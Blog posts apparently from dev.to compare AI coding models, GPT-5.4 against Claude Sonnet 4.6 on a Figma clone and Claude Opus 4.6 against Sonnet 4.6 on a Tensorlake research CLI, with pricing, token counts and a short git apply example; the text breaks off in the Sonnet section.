&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5667dzgr6es7701tau2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5667dzgr6es7701tau2.png" alt="gpt 5.4 pricing" width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The standard &lt;strong&gt;GPT-5.4&lt;/strong&gt; model is listed at &lt;strong&gt;$2.50 per 1M input tokens&lt;/strong&gt;, &lt;strong&gt;$0.25 cached input&lt;/strong&gt;, and &lt;strong&gt;$15 per 1M output tokens&lt;/strong&gt;. &lt;strong&gt;GPT-5.4 Pro&lt;/strong&gt; is way more expensive at &lt;strong&gt;$30 input&lt;/strong&gt; and &lt;strong&gt;$180 output per 1M tokens&lt;/strong&gt;, and OpenAI says it can take several minutes on hard tasks, so that one is clearly for cases where you really want the best answer and are okay paying for it.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 The normal GPT-5.4 model is probably the one most people will actually care about day to day, and that's what I'd prefer.&lt;/p&gt;
&lt;/blockquote&gt;
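To make those rates concrete, here's a quick back-of-envelope calculation using the standard GPT-5.4 prices quoted above; the token counts are an arbitrary example workload, not real usage data:

```python
# Back-of-envelope API cost at the standard GPT-5.4 list prices quoted above:
# $2.50 / 1M input tokens, $0.25 / 1M cached input tokens, $15 / 1M output tokens.
# The token counts below are an arbitrary example workload.

PRICE_PER_M = {"input": 2.50, "cached_input": 0.25, "output": 15.00}

def cost_usd(input_tokens: int, cached_tokens: int, output_tokens: int) -> float:
    return (
        input_tokens / 1e6 * PRICE_PER_M["input"]
        + cached_tokens / 1e6 * PRICE_PER_M["cached_input"]
        + output_tokens / 1e6 * PRICE_PER_M["output"]
    )

# e.g. 150K fresh input, 1M cached input, 15K output:
print(round(cost_usd(150_000, 1_000_000, 15_000), 2))  # 0.85
```

Note how caching dominates the savings: the same 1M tokens cost $2.50 fresh but only $0.25 cached.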

&lt;p&gt;And as always, benchmarks are benchmarks. But on paper at least, GPT-5.4 looks like one of the strongest all-rounder models OpenAI has shipped so far.&lt;/p&gt;




&lt;h2&gt;
  
  
  Quick Coding Test
&lt;/h2&gt;

&lt;p&gt;As this is a general-purpose model instead of a coding-tuned model, comparing the model's ability solely on coding is just not fair. But as developers, we mostly care about how good the model is at coding anyway, so just to give you an idea of how this model performs, we will do a quick test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6l1l9xllt29e4rzqakqa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6l1l9xllt29e4rzqakqa.png" alt="gpt 5.4 benchmark compared to 5.3 codex" width="800" height="404"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, there's not much difference in SWE-Bench between GPT-5.4 and GPT-5.3-Codex:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.4&lt;/strong&gt;: Latency (s): 1,053, Accuracy: 57.7%, Effort: xhigh&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.3-Codex&lt;/strong&gt;: Latency (s): 1,114, Accuracy: 57.2%, Effort: xhigh&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But to give you an idea of what to expect from this model in coding, I will run one small, quick test.&lt;/p&gt;

&lt;p&gt;Let's take two general models, one from Anthropic, Claude Sonnet 4.6, and one from OpenAI, GPT-5.4, &lt;strong&gt;not pro&lt;/strong&gt;, and compare them against each other to show the difference in their coding skills.&lt;/p&gt;

&lt;p&gt;For the test, we will use the following CLI coding agents:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.6:&lt;/strong&gt; Claude Code (Anthropic’s terminal-based agentic coding tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI GPT-5.4:&lt;/strong&gt; Codex CLI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As GPT-5.4 is said to be strong in frontend, why not test it on frontend itself?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3mnuibaxl0c6acx4npd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3mnuibaxl0c6acx4npd.png" alt="gpt 5.4 frontend claim" width="800" height="180"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Test: Figma Design Clone with MCP
&lt;/h3&gt;

&lt;p&gt;In this test, we'll compare both models on a Figma design: a complex dashboard with a lot going on in the UI.&lt;/p&gt;

&lt;p&gt;Here's the prompt, including the Figma design that I'll ask both models to clone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;Prompt:

Build a &lt;span class="gs"&gt;**pixel-accurate clone**&lt;/span&gt; of the attached Figma design frame using the &lt;span class="gs"&gt;**provided Next.js project**&lt;/span&gt; as the starting point. Do &lt;span class="gs"&gt;**not**&lt;/span&gt; create a new project. Instead, implement the UI inside the existing codebase.

https://www.figma.com/design/8quNKljV0spv67VAGsA75D/Dashboard-Design-Concept--Community---Copy-?node-id=69-123&amp;amp;t=Tvu2UB7UDMqkvPRb-4

Please match the design as closely as possible, with close attention to layout, spacing, alignment, typography, colors, borders, shadows, corner radius, and overall visual balance.

Requirements:
&lt;span class="p"&gt;
*&lt;/span&gt; use the existing &lt;span class="gs"&gt;**Next.js**&lt;/span&gt; setup
&lt;span class="p"&gt;*&lt;/span&gt; keep the code clean and componentized
&lt;span class="p"&gt;*&lt;/span&gt; make the page responsive without changing the intended design
&lt;span class="p"&gt;*&lt;/span&gt; use semantic HTML where appropriate
&lt;span class="p"&gt;*&lt;/span&gt; avoid adding your own design decisions unless necessary
&lt;span class="p"&gt;*&lt;/span&gt; if any part of the design is unclear, make the most reasonable choice and stay visually consistent

Prioritize &lt;span class="gs"&gt;**design accuracy first**&lt;/span&gt;, then code quality.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  GPT-5.4
&lt;/h4&gt;

&lt;p&gt;GPT-5.4 pretty much one-shotted the entire implementation, which was honestly nice to see. It did not need any follow-up prompt, no fixing, nothing. It just took the Figma frame through MCP and started building the whole thing right away.&lt;/p&gt;

&lt;p&gt;The final result actually looked decent. I would not call it pixel-perfect by any means, but compared to Claude Sonnet 4.6, the implementation looked noticeably better overall. That said, the whole thing still feels more like a static picture of the design than an interface you can actually interact with.&lt;/p&gt;

&lt;p&gt;Time-wise, it took roughly &lt;strong&gt;5 minutes&lt;/strong&gt; to get to a working build.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/4yxzh0qxm5c"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/f6edd67c32037c0a69def1b10985855d" rel="noopener noreferrer"&gt;GPT-5.4 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage looked like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total Token Usage:&lt;/strong&gt; 166,501&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Token Usage:&lt;/strong&gt; 151,595&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cached Input Tokens:&lt;/strong&gt; 1,291,776&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 14,906&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning Tokens:&lt;/strong&gt; 1,479&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And the following code changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 3 files changed, 803 insertions(+), 82 deletions(-)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be honest, I still would not say this is the kind of code implementation you can just ship straight to production and call it done. But for a one-shot frontend clone from a Figma frame, this was a pretty solid attempt.&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Sonnet 4.6
&lt;/h4&gt;

&lt;p&gt;Claude Sonnet 4.6 went straight into the implementation right away. It did run into an issue at first, not really a build error, but more of one of those annoying &lt;strong&gt;Next.js image gotchas&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kdi2h66gcdz807p0kom.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kdi2h66gcdz807p0kom.png" alt="claude sonnet 4.6 image impl error" width="800" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After that, I gave it a quick follow-up prompt, and almost instantly, it fixed the issue and came back with a decent implementation.&lt;/p&gt;

&lt;p&gt;As you’d expect, it did manage to clone the project structure and get the UI in place. But again, the same issue: there's no functionality whatsoever. It feels like a picture with no interactivity.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/L9l8cGBvC1U"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/61d485a452f2aab8eb41ceaa31ddd9f9" rel="noopener noreferrer"&gt;Claude Sonnet 4.6 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Time-wise, it took &lt;strong&gt;9 minutes 56 seconds&lt;/strong&gt; to get to a working result, and the follow-up fix was pretty much instant.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq0ugjnobb005rsla4bnr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq0ugjnobb005rsla4bnr.png" alt="implementation checklist" width="800" height="352"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage, based on Claude Code’s model stats, looked like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input Token Usage:&lt;/strong&gt; 84&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 35.4K&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgof5gb4r1ufiy1vpwpa4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgof5gb4r1ufiy1vpwpa4.png" alt="token usage" width="800" height="172"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And the following code changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 10 files changed, 1017 insertions(+), 84 deletions(-)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be honest, I’m not really impressed, but I’m not disappointed either. The result feels pretty neutral overall. It was able to use tools, get fairly close to the UI, and produce something usable for comparison, but the implementation itself feels a bit weird and not all that convincing.&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So, after all the benchmarks, claims, and hype, I think the fairest takeaway is this: GPT-5.4 looks very strong on paper, and for a lot of people it works and is an upgrade, but it still doesn’t seem like it is the best model you can get for coding.&lt;/p&gt;

&lt;p&gt;So yeah, I’d say GPT-5.4 is probably one of the strongest all-rounder models OpenAI has shipped so far, but whether it beats Claude, be it Sonnet or Opus, for coding in real usage is still something you’ll want to judge from your actual hands-on testing, not just benchmarks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5t6hnxig38el1bsey06l.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5t6hnxig38el1bsey06l.gif" alt="slect random gif" width="480" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And honestly, that’s the real takeaway here anyway.&lt;/p&gt;

&lt;p&gt;These models keep getting better at a speed that is honestly hard to keep up with. So rather than getting too stuck on who won one benchmark, the better thing to do is probably to keep building, keep testing, and keep learning how to use these models better for your use case.&lt;/p&gt;

&lt;p&gt;What do you think, is GPT-5.4 actually that good, or is Claude still your go-to? 👇&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=150,height=150,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>programming</category>
      <category>productivity</category>
      <category>webdev</category>
    </item>
    <item>
      <title>🔥Claude Opus 4.6 vs. Sonnet 4.6 Coding Comparison ✅</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 05 Mar 2026 14:04:59 +0000</pubDate>
      <link>https://dev.to/tensorlake/claude-opus-46-vs-sonnet-46-coding-comparison-55jn</link>
      <guid>https://dev.to/tensorlake/claude-opus-46-vs-sonnet-46-coding-comparison-55jn</guid>
      <description>&lt;p&gt;Anthropic recently dropped the updated &lt;strong&gt;Claude 4.6&lt;/strong&gt; lineup, and as usual, the two names everyone cares about are &lt;strong&gt;Opus 4.6&lt;/strong&gt; and &lt;strong&gt;Sonnet 4.6&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Opus is the expensive “best possible” model, and Sonnet is the cheaper, more general one that a lot of people actually use day to day. So I wanted to see what the real gap looks like when you ask both to build something serious, not a toy demo.&lt;/p&gt;

&lt;p&gt;Benchmark-wise, there’s a difference of course, but it doesn’t look that huge when it comes to SWE and agentic coding.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumytppa0wbbydq6y6oxq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumytppa0wbbydq6y6oxq.png" alt="Claude Opus 4.6 vs. Claude Sonnet 4.6 Benchmark comparison"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I kept it super basic: one test (but a big one), same prompt, same workflow. I just compared how close they got without me stepping in.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; Don’t take the result of this test as a hard rule. This is just one real-world coding task, run in my setup, to give you a feel for how these two models performed for me.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the takeaway, here’s the deal with these models:&lt;/p&gt;

&lt;p&gt;First, &lt;strong&gt;Opus 4.6 is the peak for coding right now&lt;/strong&gt;. At the time of writing, nothing else comes close.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.6&lt;/strong&gt; had a cleaner run. It hit a test failure too, but fixed it fast, shipped a working CLI + Tensorlake integration, and did it with way fewer tokens. Rough API-equivalent cost (output only) came out around ~$1.00, which is kind of wild for how big the project is.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.6&lt;/strong&gt; was surprisingly close for a cheaper, more general model. It built most of the project, and the CLI was mostly fine, but it ran into the same issue as Opus and couldn’t fully recover. Even after an attempted fix, the Tensorlake integration still didn’t work. Output-only cost was about ~$0.87, but it used far more time and tokens overall to get there.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Obviously, this isn’t a test to “compare” the two head-to-head. It’s just to see the difference in code quality. In general, there’s never really been a fair comparison between Opus and Sonnet; since their very first launch, Opus has always been on another level.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Test Workflow
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ &lt;strong&gt;NOTE:&lt;/strong&gt; Before we start this test, I just want to clarify one thing. I'm not doing this test to compare whether Sonnet 4.6 is better than Opus 4.6 for coding, because obviously Opus 4.6 is a lot better. This is to give you an idea of how well Opus 4.6 performs compared to Sonnet.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For the test, we will use everyone's favorite CLI coding agent, &lt;strong&gt;Claude Code&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Since both models are from Anthropic, Claude Code works well with both and is &lt;strong&gt;not biased&lt;/strong&gt; toward either.&lt;/p&gt;

&lt;p&gt;We will test both models on one decently complex task:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Task:&lt;/strong&gt; Build a complete Tensorlake project in Python called &lt;code&gt;research_pack&lt;/code&gt;, a “Deep Research Pack” generator that turns a topic into:
&lt;ul&gt;
&lt;li&gt;a citation-backed &lt;strong&gt;Markdown report&lt;/strong&gt;, and&lt;/li&gt;
&lt;li&gt;a machine-readable &lt;strong&gt;source library JSON&lt;/strong&gt; with extracted text, metadata, summaries, you get the idea.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It also has to ship a nice CLI called &lt;strong&gt;&lt;code&gt;research-pack&lt;/code&gt;&lt;/strong&gt; with commands like:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;research-pack run "&amp;lt;topic&amp;gt;"&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;research-pack status &amp;lt;run_id&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;research-pack open &amp;lt;run_id&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We’ll compare the overall feel, code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; Just like my previous tests, I’ll share each model’s changes as a &lt;code&gt;.patch&lt;/code&gt; file so you can reproduce the exact result locally with &lt;code&gt;git apply &amp;lt;file.patch&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
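&lt;p&gt;If you haven’t used &lt;code&gt;git apply&lt;/code&gt; before, here’s a minimal, self-contained sketch of that workflow. The patch content below is a throwaway stand-in, not the real model-generated file:&lt;/p&gt;

```shell
# Minimal end-to-end sketch of reproducing changes from a .patch file.
# "model.patch" and its contents are stand-ins for the real patch.
set -e
dir=$(mktemp -d); cd "$dir"
git init -q .
printf 'hello\n' > app.txt
cat > model.patch <<'EOF'
diff --git a/app.txt b/app.txt
--- a/app.txt
+++ b/app.txt
@@ -1 +1,2 @@
 hello
+world
EOF
git apply --stat model.patch    # preview which files the patch touches
git apply --check model.patch   # dry-run: exits non-zero if it won't apply cleanly
git apply model.patch           # actually apply the changes
cat app.txt                     # now contains "hello" and "world"
```

&lt;p&gt;The &lt;code&gt;--check&lt;/code&gt; dry-run is worth running first so you don’t end up with a half-applied patch on a dirty working tree.&lt;/p&gt;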

&lt;h3&gt;
  
  
  Why Tensorlake?
&lt;/h3&gt;

&lt;p&gt;Tensorlake is a solid choice for this Opus 4.6 vs Sonnet 4.6 test because it is a real platform with enough complexity to quickly show whether a model can actually build something end to end. It has an agent runtime with durable execution, sandboxed code execution, and built-in observability, so the test is not just writing a few functions; it is wiring up a production workflow.&lt;/p&gt;

&lt;p&gt;And selfishly, it is also a good dogfood moment. 👀 If a model can spin up a Tensorlake project from scratch and get it working, that says two things: these recent models are getting scary good, and Tensorlake is genuinely usable for building serious agent-style pipelines.&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Tests
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Test: Deep Research Agent
&lt;/h3&gt;

&lt;p&gt;For this test, both models had to build the &lt;code&gt;research_pack&lt;/code&gt; Tensorlake project in Python. The goal was simple: give it a topic, it crawls stuff, figures out sources, improves them, and spits out:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;report.md&lt;/code&gt; with &lt;code&gt;[S1]&lt;/code&gt; style citations&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;library.json&lt;/code&gt; with the full source library&lt;/li&gt;
&lt;li&gt;a clean CLI: &lt;code&gt;research-pack run/status/open&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;plus Tensorlake deploy support so you can trigger it as an app, not just locally&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can find the prompt I’ve used here: &lt;a href="https://gist.github.com/shricodev/4a47d65ec12229bdfda2b836b226eb50" rel="noopener noreferrer"&gt;Research Agent Prompt&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One thing that surprised me is that both models ran into basically the &lt;strong&gt;exact same issue&lt;/strong&gt; during the run.&lt;/p&gt;

&lt;p&gt;That shows how similarly these models can behave, which is kind of creepy. If you give them the exact same task and constraints, they’ll often make similar choices. I wanted to call that out because you might’ve noticed the same pattern too.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fieqnz7blm1i18d4ypxg5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fieqnz7blm1i18d4ypxg5.png" alt="AI models behaving similarly"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Not surprisingly, &lt;strong&gt;Opus fixed it much faster and with way fewer tokens&lt;/strong&gt;. Sonnet took longer, burned a lot more context trying to debug it, and even after the fix pass, it still didn’t fully work.&lt;/p&gt;




&lt;h3&gt;
  
  
  Claude Opus 4.6
&lt;/h3&gt;

&lt;p&gt;Opus was pretty straightforward.&lt;/p&gt;

&lt;p&gt;It did hit a failure while running tests, but it was a quick fix. After that, everything looked clean: the CLI worked, offline mode worked, and all the feature flags seemed to work perfectly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatt1ijsaq7uy4d380p2o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatt1ijsaq7uy4d380p2o.png" alt="Opus 4.6 project build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s the acceptance checklist it generated at the end. I really like that it created this only after making sure all tests pass and everything is in place; that’s how it’s done.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqzh8pvcjr55pcoomiyp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqzh8pvcjr55pcoomiyp.png" alt="Opus 4.6 generating checklist of work done"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the demo of the working CLI:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The API key visible in the demo videos below has been revoked. Please don’t try to use it.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Xl_bAuPbVLg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;...and how it integrates with Tensorlake:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/vzcNRkwQPAM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here in a patch file: &lt;a href="https://github.com/tensorlakeai/tensorlake-website/tree/main/research-pack/research_pack" rel="noopener noreferrer"&gt;Opus 4.6 Patch file&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$1.00&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ &lt;strong&gt;NOTE:&lt;/strong&gt; As I'm using a Claude plan and not on API usage, this is roughly calculated based on the input/output tokens.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 20 minutes 6 seconds + ~1 min 40 sec for the fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 33.2K + ~4K for the fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 156 files changed, 95013 insertions(+)&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ You can see the complexity of the project for yourself, and you’ll probably be shocked at how good these models have gotten. It’s no longer just boilerplate or small refactors. They can build a complete, end-to-end project from scratch from a single prompt. We’re officially in the real AI era.&lt;/p&gt;
&lt;/blockquote&gt;
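&lt;p&gt;For anyone curious, a rough estimate like this is just output tokens times a per-token rate. Here’s a sketch of that arithmetic; the rate below is a made-up placeholder for illustration, not official pricing:&lt;/p&gt;

```shell
# Back-of-the-envelope cost from token counts.
# PRICE_PER_M is an assumed placeholder rate, not official Anthropic pricing.
OUTPUT_TOKENS=37200   # 33.2K build + ~4K fix
PRICE_PER_M=27        # assumed output $/1M tokens (placeholder)
awk -v t="$OUTPUT_TOKENS" -v p="$PRICE_PER_M" \
  'BEGIN { printf "approx cost: $%.2f\n", t / 1000000 * p }'
```

&lt;p&gt;For a real number you’d plug in your provider’s actual input and output rates and sum both sides.&lt;/p&gt;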

&lt;h3&gt;
  
  
  Claude Sonnet 4.6
&lt;/h3&gt;

&lt;p&gt;Sonnet was… close, but not quite as clean as Opus.&lt;/p&gt;

